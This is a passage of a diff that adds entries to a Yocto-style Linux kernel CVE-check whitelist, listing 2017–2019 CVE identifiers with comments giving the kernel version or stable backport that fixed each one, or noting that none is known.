+CVE_CHECK_WHITELIST += "CVE-2017-8061"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8062"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8063"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8064"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8065"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8066"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8067"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8068"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8069"
+
+# fixed-version: Fixed after version 4.10rc8
+CVE_CHECK_WHITELIST += "CVE-2017-8070"
+
+# fixed-version: Fixed after version 4.10rc7
+CVE_CHECK_WHITELIST += "CVE-2017-8071"
+
+# fixed-version: Fixed after version 4.10rc7
+CVE_CHECK_WHITELIST += "CVE-2017-8072"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8106"
+
+# fixed-version: Fixed after version 3.19rc6
+CVE_CHECK_WHITELIST += "CVE-2017-8240"
+
+# CVE-2017-8242 has no known resolution
+
+# CVE-2017-8244 has no known resolution
+
+# CVE-2017-8245 has no known resolution
+
+# CVE-2017-8246 has no known resolution
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8797"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2017-8824"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8831"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-8890"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8924"
+
+# fixed-version: Fixed after version 4.11rc2
+CVE_CHECK_WHITELIST += "CVE-2017-8925"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9059"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9074"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9075"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9076"
+
+# fixed-version: Fixed after version 4.12rc2
+CVE_CHECK_WHITELIST += "CVE-2017-9077"
+
+# fixed-version: Fixed after version 4.12rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9150"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-9211"
+
+# fixed-version: Fixed after version 4.12rc3
+CVE_CHECK_WHITELIST += "CVE-2017-9242"
+
+# fixed-version: Fixed after version 4.12rc5
+CVE_CHECK_WHITELIST += "CVE-2017-9605"
+
+# fixed-version: Fixed after version 4.3rc7
+CVE_CHECK_WHITELIST += "CVE-2017-9725"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9984"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9985"
+
+# fixed-version: Fixed after version 4.15rc1
+CVE_CHECK_WHITELIST += "CVE-2017-9986"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-1000004"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1000026"
+
+# fixed-version: Fixed after version 4.15
+CVE_CHECK_WHITELIST += "CVE-2018-1000028"
+
+# fixed-version: Fixed after version 4.16
+CVE_CHECK_WHITELIST += "CVE-2018-1000199"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2018-1000200"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1000204"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-10021"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-10074"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10087"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10124"
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10322"
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10323"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-1065"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1066"
+
+# fixed-version: Fixed after version 4.13rc6
+CVE_CHECK_WHITELIST += "CVE-2018-10675"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-1068"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10840"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10853"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1087"
+
+# CVE-2018-10872 has no known resolution
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10876"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10877"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10878"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10879"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10880"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10881"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10882"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-10883"
+
+# fixed-version: Fixed after version 2.6.36rc1
+CVE_CHECK_WHITELIST += "CVE-2018-10901"
+
+# fixed-version: Fixed after version 4.18rc6
+CVE_CHECK_WHITELIST += "CVE-2018-10902"
+
+# fixed-version: Fixed after version 4.14rc2
+CVE_CHECK_WHITELIST += "CVE-2018-1091"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1092"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1093"
+
+# fixed-version: Fixed after version 4.13rc5
+CVE_CHECK_WHITELIST += "CVE-2018-10938"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1094"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-10940"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1095"
+
+# fixed-version: Fixed after version 4.17rc2
+CVE_CHECK_WHITELIST += "CVE-2018-1108"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1118"
+
+# fixed-version: Fixed after version 4.17rc6
+CVE_CHECK_WHITELIST += "CVE-2018-1120"
+
+# CVE-2018-1121 has no known resolution
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-11232"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1128"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-1129"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-1130"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-11412"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-11506"
+
+# fixed-version: Fixed after version 4.17rc5
+CVE_CHECK_WHITELIST += "CVE-2018-11508"
+
+# CVE-2018-11987 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12126"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12127"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12130"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12207"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12232"
+
+# fixed-version: Fixed after version 4.18rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12233"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12633"
+
+# fixed-version: Fixed after version 4.18rc2
+CVE_CHECK_WHITELIST += "CVE-2018-12714"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12896"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-12904"
+
+# CVE-2018-12928 has no known resolution
+
+# CVE-2018-12929 has no known resolution
+
+# CVE-2018-12930 has no known resolution
+
+# CVE-2018-12931 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13053"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13093"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13094"
+
+# fixed-version: Fixed after version 4.18rc3
+CVE_CHECK_WHITELIST += "CVE-2018-13095"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13096"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13097"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13098"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13099"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13100"
+
+# fixed-version: Fixed after version 4.18rc4
+CVE_CHECK_WHITELIST += "CVE-2018-13405"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-13406"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14609"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14610"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14611"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14612"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14613"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14614"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14615"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14616"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14617"
+
+# fixed-version: Fixed after version 4.15rc4
+CVE_CHECK_WHITELIST += "CVE-2018-14619"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-14625"
+
+# fixed-version: Fixed after version 4.19rc6
+CVE_CHECK_WHITELIST += "CVE-2018-14633"
+
+# fixed-version: Fixed after version 4.13rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14634"
+
+# fixed-version: Fixed after version 4.19rc4
+CVE_CHECK_WHITELIST += "CVE-2018-14641"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-14646"
+
+# fixed-version: Fixed after version 4.19rc2
+CVE_CHECK_WHITELIST += "CVE-2018-14656"
+
+# fixed-version: Fixed after version 4.18rc8
+CVE_CHECK_WHITELIST += "CVE-2018-14678"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-14734"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-15471"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-15572"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-15594"
+
+# fixed-version: Fixed after version 4.18rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16276"
+
+# fixed-version: Fixed after version 4.8rc1
+CVE_CHECK_WHITELIST += "CVE-2018-16597"
+
+# fixed-version: Fixed after version 4.19rc2
+CVE_CHECK_WHITELIST += "CVE-2018-16658"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16862"
+
+# fixed-version: Fixed after version 4.20rc3
+CVE_CHECK_WHITELIST += "CVE-2018-16871"
+
+# fixed-version: Fixed after version 5.0rc5
+CVE_CHECK_WHITELIST += "CVE-2018-16880"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2018-16882"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-16884"
+
+# CVE-2018-16885 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc4
+CVE_CHECK_WHITELIST += "CVE-2018-17182"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-17972"
+
+# CVE-2018-17977 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-18021"
+
+# fixed-version: Fixed after version 4.19
+CVE_CHECK_WHITELIST += "CVE-2018-18281"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2018-18386"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-18397"
+
+# fixed-version: Fixed after version 4.19rc7
+CVE_CHECK_WHITELIST += "CVE-2018-18445"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-18559"
+
+# CVE-2018-18653 has no known resolution
+
+# fixed-version: Fixed after version 4.17rc4
+CVE_CHECK_WHITELIST += "CVE-2018-18690"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-18710"
+
+# fixed-version: Fixed after version 4.20rc2
+CVE_CHECK_WHITELIST += "CVE-2018-18955"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-19406"
+
+# fixed-version: Fixed after version 4.20rc5
+CVE_CHECK_WHITELIST += "CVE-2018-19407"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-19824"
+
+# fixed-version: Fixed after version 4.20rc3
+CVE_CHECK_WHITELIST += "CVE-2018-19854"
+
+# fixed-version: Fixed after version 4.20
+CVE_CHECK_WHITELIST += "CVE-2018-19985"
+
+# fixed-version: Fixed after version 4.20rc6
+CVE_CHECK_WHITELIST += "CVE-2018-20169"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-20449"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20509"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-20510"
+
+# fixed-version: Fixed after version 4.19rc5
+CVE_CHECK_WHITELIST += "CVE-2018-20511"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20669"
+
+# fixed-version: Fixed after version 5.0rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20784"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20836"
+
+# fixed-version: Fixed after version 4.20rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20854"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20855"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20856"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20961"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-20976"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2018-21008"
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-25015"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-25020"
+
+# CVE-2018-3574 has no known resolution
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3620"
+
+# fixed-version: Fixed after version 4.17rc7
+CVE_CHECK_WHITELIST += "CVE-2018-3639"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3646"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3665"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-3693"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5332"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5333"
+
+# fixed-version: Fixed after version 4.15rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5344"
+
+# fixed-version: Fixed after version 4.18rc7
+CVE_CHECK_WHITELIST += "CVE-2018-5390"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5391"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-5703"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5750"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5803"
+
+# fixed-version: Fixed after version 4.17rc6
+CVE_CHECK_WHITELIST += "CVE-2018-5814"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-5848"
+
+# Skipping CVE-2018-5856, no affected_versions
+
+# fixed-version: Fixed after version 4.11rc8
+CVE_CHECK_WHITELIST += "CVE-2018-5873"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-5953"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-5995"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-6412"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-6554"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2018-6555"
+
+# CVE-2018-6559 has no known resolution
+
+# fixed-version: Fixed after version 4.15rc9
+CVE_CHECK_WHITELIST += "CVE-2018-6927"
+
+# fixed-version: Fixed after version 4.14rc6
+CVE_CHECK_WHITELIST += "CVE-2018-7191"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7273"
+
+# fixed-version: Fixed after version 4.11rc1
+CVE_CHECK_WHITELIST += "CVE-2018-7480"
+
+# fixed-version: Fixed after version 4.15rc3
+CVE_CHECK_WHITELIST += "CVE-2018-7492"
+
+# fixed-version: Fixed after version 4.16rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7566"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-7740"
+
+# fixed-version: Fixed after version 4.15rc2
+CVE_CHECK_WHITELIST += "CVE-2018-7754"
+
+# fixed-version: Fixed after version 4.19rc5
+CVE_CHECK_WHITELIST += "CVE-2018-7755"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-7757"
+
+# fixed-version: Fixed after version 4.16rc5
+CVE_CHECK_WHITELIST += "CVE-2018-7995"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-8043"
+
+# fixed-version: Fixed after version 4.16rc1
+CVE_CHECK_WHITELIST += "CVE-2018-8087"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8781"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8822"
+
+# fixed-version: Fixed after version 4.16rc7
+CVE_CHECK_WHITELIST += "CVE-2018-8897"
+
+# fixed-version: Fixed after version 4.19rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9363"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9385"
+
+# fixed-version: Fixed after version 4.17rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9415"
+
+# fixed-version: Fixed after version 4.6rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9422"
+
+# fixed-version: Fixed after version 4.15rc6
+CVE_CHECK_WHITELIST += "CVE-2018-9465"
+
+# fixed-version: Fixed after version 4.18rc5
+CVE_CHECK_WHITELIST += "CVE-2018-9516"
+
+# fixed-version: Fixed after version 4.14rc1
+CVE_CHECK_WHITELIST += "CVE-2018-9517"
+
+# fixed-version: Fixed after version 4.16rc3
+CVE_CHECK_WHITELIST += "CVE-2018-9518"
+
+# fixed-version: Fixed after version 4.14rc4
+CVE_CHECK_WHITELIST += "CVE-2018-9568"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-0136"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0145"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0146"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0147"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0148"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-0149"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-0154"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-0155"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10124"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10125"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-10126"
+
+# CVE-2019-10140 has no known resolution
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10142"
+
+# fixed-version: Fixed after version 5.3rc3
+CVE_CHECK_WHITELIST += "CVE-2019-10207"
+
+# fixed-version: Fixed after version 5.4rc2
+CVE_CHECK_WHITELIST += "CVE-2019-10220"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-10638"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-10639"
+
+# fixed-version: Fixed after version 5.0rc3
+CVE_CHECK_WHITELIST += "CVE-2019-11085"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11091"
+
+# fixed-version: Fixed after version 5.4rc8
+CVE_CHECK_WHITELIST += "CVE-2019-11135"
+
+# fixed-version: Fixed after version 4.8rc5
+CVE_CHECK_WHITELIST += "CVE-2019-11190"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11191"
+
+# fixed-version: Fixed after version 5.3rc4
+CVE_CHECK_WHITELIST += "CVE-2019-1125"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11477"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11478"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11479"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-11486"
+
+# fixed-version: Fixed after version 5.1rc5
+CVE_CHECK_WHITELIST += "CVE-2019-11487"
+
+# fixed-version: Fixed after version 5.1rc6
+CVE_CHECK_WHITELIST += "CVE-2019-11599"
+
+# fixed-version: Fixed after version 5.1
+CVE_CHECK_WHITELIST += "CVE-2019-11683"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11810"
+
+# fixed-version: Fixed after version 5.1rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11811"
+
+# fixed-version: Fixed after version 5.1rc4
+CVE_CHECK_WHITELIST += "CVE-2019-11815"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11833"
+
+# fixed-version: Fixed after version 5.2rc1
+CVE_CHECK_WHITELIST += "CVE-2019-11884"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12378"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12379"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12380"
+
+# fixed-version: Fixed after version 5.2rc3
+CVE_CHECK_WHITELIST += "CVE-2019-12381"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12382"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12454"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12455"
+
+# CVE-2019-12456 has no known resolution
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12614"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-12615"
+
+# fixed-version: Fixed after version 5.2rc7
+CVE_CHECK_WHITELIST += "CVE-2019-12817"
+
+# fixed-version: Fixed after version 5.0
+CVE_CHECK_WHITELIST += "CVE-2019-12818"
+
+# fixed-version: Fixed after version 5.0rc8
+CVE_CHECK_WHITELIST += "CVE-2019-12819"
+
+# fixed-version: Fixed after version 4.18rc1
+CVE_CHECK_WHITELIST += "CVE-2019-12881"
+
+# fixed-version: Fixed after version 5.2rc6
+CVE_CHECK_WHITELIST += "CVE-2019-12984"
+
+# fixed-version: Fixed after version 5.2rc4
+CVE_CHECK_WHITELIST += "CVE-2019-13233"
+
+# fixed-version: Fixed after version 5.2
+CVE_CHECK_WHITELIST += "CVE-2019-13272"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-13631"
+
+# fixed-version: Fixed after version 5.3rc2
+CVE_CHECK_WHITELIST += "CVE-2019-13648"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14283"
+
+# fixed-version: Fixed after version 5.3rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14284"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-14615"
+
+# fixed-version: Fixed after version 4.17rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14763"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14814"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14815"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14816"
+
+# fixed-version: Fixed after version 5.4rc1
+CVE_CHECK_WHITELIST += "CVE-2019-14821"
+
+# fixed-version: Fixed after version 5.3
+CVE_CHECK_WHITELIST += "CVE-2019-14835"
+
+# cpe-stable-backport: Backported in 5.4.12
+CVE_CHECK_WHITELIST += "CVE-2019-14895"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2019-14896"
+
+# cpe-stable-backport: Backported in 5.4.16
+CVE_CHECK_WHITELIST += "CVE-2019-14897"
+
+# CVE-2019-14898 has no known resolution
+
+# cpe-stable-backport: Backported in 5.4.11
+CVE_CHECK_WHITELIST += "CVE-2019-14901"
+
+# fixed-version: Fixed after version 5.3rc8
+CVE_CHECK_WHITELIST += "CVE-2019-15030"
+
+# fixed-version: Fixed after version 5.3rc8
+CVE_CHECK_WHITELIST += "CVE-2019-15031"
+
+# fixed-version: Fixed after version 5.2rc2
+CVE_CHECK_WHITELIST += "CVE-2019-15090"
+
+# fixed-version: Fixed after version 5.4rc1
